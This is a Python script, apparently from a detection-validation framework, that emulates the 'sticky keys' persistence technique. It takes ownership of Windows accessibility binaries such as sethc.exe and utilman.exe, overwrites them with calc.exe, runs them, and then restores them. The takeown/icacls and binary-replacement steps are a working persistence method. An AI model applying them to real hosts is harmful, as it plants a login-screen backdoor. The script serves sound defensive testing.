in cortado/rtas/sticky_keys_write_execute.py [0:0]
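def main():
    """Emulate accessibility-binary replacement so detections can be validated.

    For each Windows accessibility executable in ``bins`` the routine backs
    the file up, takes ownership, overwrites it with calc.exe, launches it
    once, then copies the original back, hands ownership back to
    TrustedInstaller and reduces Administrators to read/execute. This is the
    file-write/execute pattern behind the "sticky keys" persistence technique
    (MITRE ATT&CK T1546.008, Accessibility Features).

    Intended for a disposable test host: it modifies files under System32,
    and the takeown/icacls steps only succeed from an elevated session.

    Raises:
        RuntimeError: if the backup copy of a binary is missing after the
            backup step; that binary is left untouched.
    """
    # Accessibility executables exercised by the test.
    bins = [
        "sethc.exe",
        "utilman.exe",
        "narrator.exe",
        "magnify.exe",
        "osk.exe",
        "displayswitch.exe",
        "atbroker.exe",
    ]
    calc = Path("\\windows\\system32\\calc.exe").resolve()
    # The backup is written to the current working directory and reused for
    # every binary in turn.
    temp = Path("temp.exe").resolve()

    try:
        for bin_name in bins:
            bin_path = Path("\\Windows\\system32\\" + bin_name).resolve()

            # Back up the original before anything is modified.
            _common.copy_file(bin_path, temp)
            if not temp.is_file():
                # Never overwrite a system binary that cannot be restored.
                raise RuntimeError(
                    f"backup of {bin_path} was not created; refusing to overwrite it"
                )

            try:
                # Take ownership for the Administrators group and grant it
                # full control so the protected file becomes writable.
                _ = _common.execute_command(["takeown", "/F", bin_path, "/A"])
                _ = _common.execute_command(["icacls", bin_path, "/grant", "Administrators:F"])

                # Overwrite the binary with calc.exe, then run it; the short
                # timeout keeps the harness from waiting on the GUI process.
                _common.copy_file(calc, bin_path)
                _ = _common.execute_command(str(bin_path), shell=True, timeout_secs=1)
            finally:
                # Restore the original file, owner and ACL even when a step
                # above failed, so the host is not left with a replaced
                # accessibility binary or a widened ACL.
                _common.copy_file(temp, bin_path)
                _ = _common.execute_command(
                    ["icacls", bin_path, "/setowner", "NT SERVICE\\TrustedInstaller"]
                )
                _ = _common.execute_command(["icacls", bin_path, "/grant:r", "Administrators:RX"])
                _common.remove_file(temp)
    finally:
        # Cleanup: give the launched processes a moment to start, then end them.
        time.sleep(2)
        _ = _common.execute_command(["taskkill", "/F", "/im", "calculator.exe"])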